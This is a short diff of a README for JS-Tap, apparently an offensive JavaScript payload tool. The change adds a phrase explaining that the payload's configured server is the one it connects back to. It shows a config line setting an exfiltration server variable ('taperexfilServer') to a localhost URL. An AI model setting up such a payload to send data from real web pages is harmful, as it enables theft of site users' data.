hoodoer/JS-Tap/README.md

 These configuration variables are in the **initGlobals()** function.

 #### JS-Tap Server Location
-You need to configure the payload with the URL of the JS-Tap server
+You need to configure the payload with the URL of the JS-Tap server it will connect back to.
 ```
 window.taperexfilServer = "https://127.0.0.1:8444";
 ```